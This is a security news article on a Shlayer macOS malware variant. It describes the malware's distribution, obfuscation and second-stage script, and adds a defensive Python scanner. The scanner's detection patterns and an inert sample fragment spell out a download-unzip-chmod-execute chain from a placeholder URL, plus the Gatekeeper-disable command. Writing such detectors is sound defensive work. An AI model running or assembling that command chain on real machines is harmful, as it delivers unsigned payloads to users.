Another piece of Mac malware has been discovered. More specifically, security researchers came across a new variant of the so-called Shlayer malware, which has been targeting macOS users. Shlayer is a multi-stage malware, and in its latest version it has acquired privilege escalation capabilities.
The malware can also disable Gatekeeper in order to run unsigned second-stage payloads. Shlayer was first discovered in February 2018 by Intego researchers; the latest variant, however, was found by Carbon Black’s Threat Analysis Unit.
Shlayer macOS Malware New Variant: Technical Details
The malware is currently being distributed in the form of downloads from various websites, disguised as an Adobe Flash update.
Many of the sites redirecting to the fake updates have been masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from malvertisements on legitimate sites, Carbon Black said.
The samples analyzed by the researchers are affecting macOS versions from 10.10.5 to 10.14.3, with macOS being the only target so far.
According to the report:
The malware employs multiple levels of obfuscation and is capable of privilege escalation. Many of the initial DMGs are signed with a legitimate Apple developer ID and use legitimate system applications via bash to conduct all installation activity. Although most samples were DMG files, we also discovered .pkg, .iso, and .zip payloads.
The malicious script within the DMG file is obfuscated with base64 encoding and decrypts a second, AES-encrypted script, which is executed automatically once decrypted.
It is this second script that performs the following malicious activities, as per the report:
– Collects system information such as the macOS version and the IOPlatformUUID (a unique identifier for the system)
– Generates a “Session GUID” using uuidgen
– Creates a custom URL from the information gathered in the previous two steps and uses it to fetch the second-stage payload
– Attempts to download the zip file payload using curl
– Creates a directory in /tmp to store the payload and unzips the password-protected archive (note: the zip password is hardcoded in the script, per sample)
– Makes the binary within the unzipped .app executable using chmod +x
– Executes the payload using open with the passed arguments “s”, “$session_guid” and “$volume_name”
– Performs a killall Terminal to close the terminal window of the running script
The malware then downloads further payloads in the form of adware. The researchers say that Shlayer makes sure these payloads will run by disabling Gatekeeper.
Once this is done, the second-stage payloads behave like whitelisted software, as macOS will no longer check whether they are signed with an Apple developer ID. And in case Gatekeeper is not successfully disabled, the payloads are signed with valid developer IDs anyway.
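The step list above and the Gatekeeper note are the kind of behaviour a defender can look for statically in an installer script before it runs. The following is an added example, not Carbon Black's or Intego's tooling: a small heuristic scanner that flags the commands the report attributes to the second-stage script (base64 and AES decoding, uuidgen, IOPlatformUUID lookup, curl, a password-protected unzip into /tmp, chmod +x, open on an .app, killall Terminal) and the standard Gatekeeper-disable command spctl --master-disable, which the article mentions only as "disabling Gatekeeper". The indicator names, weights and threshold are assumptions chosen for illustration, and both sample scripts are constructed and inert (placeholder variables, no URL, no payload).

```python
"""Heuristic static scanner for macOS shell installer scripts.

Added example (not Carbon Black's or Intego's code). Flags the behaviours
the report attributes to Shlayer's second-stage script. Pattern names,
weights and the threshold are assumptions for illustration.
"""
import re

# One regex per behaviour described in the article. These are heuristics
# matched line by line, not signatures for any specific sample.
INDICATORS = {
    "base64_decode":   re.compile(r"\bbase64\b[^\n]*(-d|-D|--decode)"),
    "openssl_decrypt": re.compile(r"\bopenssl\b[^\n]*\baes\b[^\n]*\s-d\b"),
    "platform_uuid":   re.compile(r"IOPlatformUUID"),
    "session_guid":    re.compile(r"\buuidgen\b"),
    "curl_download":   re.compile(r"\bcurl\b"),
    "tmp_staging":     re.compile(r"/tmp/"),
    "password_unzip":  re.compile(r"\bunzip\b[^\n]*\s-P\s*\S+"),
    "chmod_exec":      re.compile(r"\bchmod\s+\+x\b"),
    "open_app":        re.compile(r"\bopen\b[^\n]*\.app\b"),
    "kill_terminal":   re.compile(r"\bkillall\s+Terminal\b"),
    # spctl --master-disable is the standard command that turns Gatekeeper off;
    # the article states Gatekeeper is disabled but does not quote the command.
    "gatekeeper_off":  re.compile(r"\bspctl\b[^\n]*--master-disable"),
}

# Indicators that are rare in legitimate installers get double weight (assumed).
HIGH_WEIGHT = {"gatekeeper_off", "kill_terminal", "password_unzip", "openssl_decrypt"}


def scan_script(text):
    """Return {indicator_name: [1-based line numbers where it matched]}."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def risk_score(hits):
    """Weighted count of distinct indicators present (multiplicity ignored)."""
    return sum(2 if name in HIGH_WEIGHT else 1 for name in hits)


def classify(text, threshold=6):
    """Label a script 'suspicious' when its weighted indicator score reaches the threshold."""
    return "suspicious" if risk_score(scan_script(text)) >= threshold else "benign"


# Constructed sample: a benign installer that only copies and opens an app bundle.
BENIGN_SCRIPT = """#!/bin/bash
set -e
mkdir -p "$HOME/Applications"
cp -R "./Example.app" "$HOME/Applications/"
open "$HOME/Applications/Example.app"
"""

# Constructed sample: inert fragment echoing the command chain in the article,
# with placeholder variables only (no URL, no password, no payload).
SUSPICIOUS_SCRIPT = """#!/bin/bash
# constructed fragment: commands only, nothing here downloads or runs anything
id=$(some_cmd | grep IOPlatformUUID)
session=$(uuidgen)
curl -o /tmp/payload.zip "$url"
unzip -P "$zip_password" /tmp/payload.zip -d /tmp
chmod +x /tmp/Payload.app/Contents/MacOS/Payload
open /tmp/Payload.app --args s "$session" "$volume_name"
killall Terminal
"""

if __name__ == "__main__":
    for label, script in (("benign", BENIGN_SCRIPT), ("suspicious", SUSPICIOUS_SCRIPT)):
        hits = scan_script(script)
        print(f"{label}: score={risk_score(hits)} verdict={classify(script)} hits={sorted(hits)}")
```

The scanner scores distinct indicators rather than raw match counts, so a long legitimate script that calls curl many times does not outscore a short one that combines a password-protected unzip, chmod +x and killall Terminal; in practice the weights and threshold would be tuned against the installer scripts normally seen in the environment.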
Even though Shlayer is currently distributing adware, future variants may deliver more dangerous payloads. Adware should not be underestimated in any case, as it can degrade macOS’s overall performance and lead to further complications.